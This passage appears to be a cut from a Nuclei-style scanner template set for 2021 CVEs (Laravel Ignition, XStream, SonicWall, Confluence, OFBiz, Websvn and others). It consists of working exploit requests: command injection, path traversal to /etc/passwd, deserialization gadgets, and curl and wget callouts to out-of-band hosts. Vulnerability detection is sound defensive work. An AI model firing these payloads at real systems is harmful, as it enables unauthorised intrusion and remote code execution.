Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>find_profile</methodName>\n  <params>\n    <param>\n      <value>\n        <struct>\n          <member>\n            <name>name</name>\n            <value>\n              <string>*</string>\n            </value>\n          </member>\n        </struct>\n      </value>\n    </param>\n  </params>\n</methodCall>\n","POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>generate_script</methodName>\n  <params>\n    <param>\n      <value>\n        <string>{{profile}}</string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string></string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string>/etc/passwd</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/xml"]},{"type":"regex","regex":["root:.*:0","bin:.*:1","nobody:.*:99"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"profile","group":1,"regex":["<value><string>(.*?)</string></value>"],"internal":true}]}]},{"id":"CVE-2021-46704","info":{"name":"GenieACS => 1.2.8 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/ping/;`id`"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["uid=([0-9]+)"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["uid=(\\d+)\\((\\w+)\\)"],"part":"body"}]}]},{"id":"CVE-2021-3129","info":{"name":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","Illuminate"],"condition":"and"},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-39146","info":{"name":"XStream 1.4.18 - Arbitrary Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\n      <unserializable-parents/>\n      <hashtable>\n          <default>\n            <loadFactor>0.75</loadFactor>\n            <threshold>525</threshold>\n          </default>\n          <int>700</int>\n          <int>0</int>\n      </hashtable>\n      <javax.swing.UIDefaults>\n          <default>\n            <defaultLocale>zh_CN</defaultLocale>\n            <resourceCache/>\n          </default>\n      </javax.swing.UIDefaults>\n      <javax.swing.MultiUIDefaults>\n          <default>\n            <tables>\n            <javax.swing.UIDefaults serialization='custom'>\n              <unserializable-parents/>\n              <hashtable>\n                <default>\n                  <loadFactor>0.75</loadFactor>\n                  <threshold>525</threshold>\n                </default>\n                <int>700</int>\n                <int>1</int>\n                <string>lazyValue</string>\n                <javax.swing.UIDefaults_-ProxyLazyValue>\n                  <className>javax.naming.InitialContext</className>\n                  <methodName>doLookup</methodName>\n                  <args>\n                    <string>ldap://{{interactsh-url}}/#evil</string>\n                  </args>\n                </javax.swing.UIDefaults_-ProxyLazyValue>\n              </hashtable>\n              <javax.swing.UIDefaults>\n                <default>\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\n                  <resourceCache/>\n                </default>\n              </javax.swing.UIDefaults>\n            </javax.swing.UIDefaults>\n            </tables>\n          </default>\n      </javax.swing.MultiUIDefaults>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-20038","info":{"name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"prefix_addr":["%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"],"system_addr":["%08%b7%06%08","%64%b8%06%08"]},"attack":"clusterbomb","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-32305","info":{"name":"Websvn <2.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-45380","info":{"name":"AppCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\"></script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25299","info":{"name":"Nagios XI 5.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-21799","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Telnet </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22205","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753","1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f","14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4","1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4","20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369","2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2","33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1","335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac","34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86","3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087","340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86","38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d","3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd","39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514","39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09","3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e","3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb","40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b","45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44","473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf","5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2","69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b","7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5","73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d","77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f","78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1","93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b","9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445","bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c","d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f","dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56","def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0","eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd","ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2021-3654","info":{"name":"Nova noVNC - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh/%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301]}]}]},{"id":"CVE-2021-40150","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/conf/nginx.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["server","listen","fastcgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41951","info":{"name":"Resourcespace - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["TEST<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37304","info":{"name":"Jeecg Boot <= 2.4.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/actuator/httptrace/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"traces\":[","\"headers\"","\"request\":{"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26084","info":{"name":"Confluence Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nqueryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n"],"payloads":{"path":["pages/createpage-entervariables.action?SpaceKey=x","pages/createpage-entervariables.action","confluence/pages/createpage-entervariables.action?SpaceKey=x","confluence/pages/createpage-entervariables.action","wiki/pages/createpage-entervariables.action?SpaceKey=x","wiki/pages/createpage-entervariables.action","pages/doenterpagevariables.action","pages/createpage.action?spaceKey=myproj","pages/templates2/viewpagetemplate.action","pages/createpage-entervariables.action","template/custom/content-editor","templates/editor-preload-container","users/user-dark-features"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"aaaa{140592=null}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28151","info":{"name":"Hongdian H8922 3.0.5 - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n","POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","application/x-www-form-urlencoded"],"condition":"or"},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22145","info":{"name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_bulk"],"body":"@\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root_cause","truncated","reason"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-20124","info":{"name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd","{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30128","info":{"name":"Apache OFBiz <17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-Map>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n          <map-Value>\n        <std-String/>\n        </map-Value>\n        </map-Entry>\n      </map-Map>\n      </ser>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"errorMessage\""]}]}]},{"id":"CVE-2021-27670","info":{"name":"Appspace 6.2.4 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30151","info":{"name":"Sidekiq <=6.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sidekiq/queues/\"onmouseover=\"alert(document.domain)\""],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=\"alert(document.domain)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41174","info":{"name":"Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Grafana","frontend_boot_js_done_time_seconds"],"condition":"and"},{"type":"regex","regex":["\"subTitle\":\"Grafana (v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"subTitle\":\"Grafana ([a-z0-9.]+)"]}]}]},{"id":"CVE-2021-20137","info":{"name":"Gryphon Tower - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["onfocus=alert(document.domain) autofocus=1>","Send Access Request URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26247","info":{"name":"Cacti - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39433","info":{"name":"BIQS IT Biqs-drive v1.83 Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24288","info":{"name":"WordPress AcyMailing <7.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-39211","info":{"name":"GLPI 9.2/<9.5.6 - Information 